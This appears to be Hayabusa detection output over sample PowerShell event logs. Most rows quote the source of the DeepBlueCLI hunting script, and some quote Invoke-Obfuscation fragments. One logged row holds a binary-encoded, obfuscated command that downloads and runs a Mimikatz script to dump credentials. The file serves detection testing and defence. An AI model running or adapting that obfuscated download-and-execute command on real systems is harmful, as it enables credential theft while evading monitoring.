# This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. 
Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.272 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:25:40.275 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" 
{$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:27:04.659 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. 
$decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:27:04.659 +00:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:27:04.660 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. 
# $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! 
characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:27:04.661 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:27:09.364 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:52.559 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:52.574 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input 
$RandomDelimiters))}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.960 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.968 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.973 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.976 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.978 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.981 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); 
If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:53.991 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:54.000 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:54.036 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:54.050 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. 
If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:56.644 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:56.651 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:55:56.696 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:09.115 +00:00,SEC511,4104,info,,PwSh Scriptblock 
Log,"-join('1001001n1000101-1011000g100000<101000e1001110F1100101-1110111@101101<1001111i1100010i1101010n1100101n1100011e1110100@100000-1001110n1100101n1110100n101110e1010111n1100101;1100010<1000011F1101100{1101001-1100101-1101110-1110100i101001<101110-1000100-1101111<1110111F1101110;1101100n1101111i1100001e1100100{1010011;1110100<1110010@1101001i1101110i1100111{101000e100111e1101000@1110100e1110100g1110000g1110011-111010-101111;101111;1110010@1100001@1110111-101110;1100111{1101001F1110100-1101000@1110101{1100010e1110101n1110011@1100101i1110010-1100011i1101111n1101110e1110100i1100101;1101110@1110100n101110i1100011<1101111n1101101-101111n1101101@1100001<1110100i1110100-1101001{1100110;1100101i1110011-1110100F1100001n1110100{1101001@1101111F1101110e101111-1010000<1101111e1110111{1100101e1110010;1010011i1110000n1101100@1101111F1101001e1110100i101111n1101101-1100001;1110011<1110100i1100101<1110010i101111<1000101;1111000;1100110-1101001-1101100<1110100;1110010F1100001<1110100{1101001@1101111n1101110i101111g1001001e1101110<1110110{1101111F1101011n1100101{101101@1001101-1101001{1101101i1101001n1101011n1100001-1110100;1111010<101110-1110000e1110011g110001e100111-101001;111011F100000@1001001{1101110g1110110{1101111i1101011F1100101-101101n1001101g1101001e1101101@1101001-1101011{1100001-1110100{1111010@100000g101101;1000100-1110101g1101101g1110000F1000011g1110010n1100101;1100100<1110011'.splIT( '<{genF-i;@' )| FOreAcH { ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) })| &( ([STRinG]$VerBosEPREfereNce)[1,3]+'x'-jOiN'')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:09.116 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:33.244 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.464 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:56:34.470 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. 
.Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. 
$username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... 
service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. 
$pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ 
$image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. 
# Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 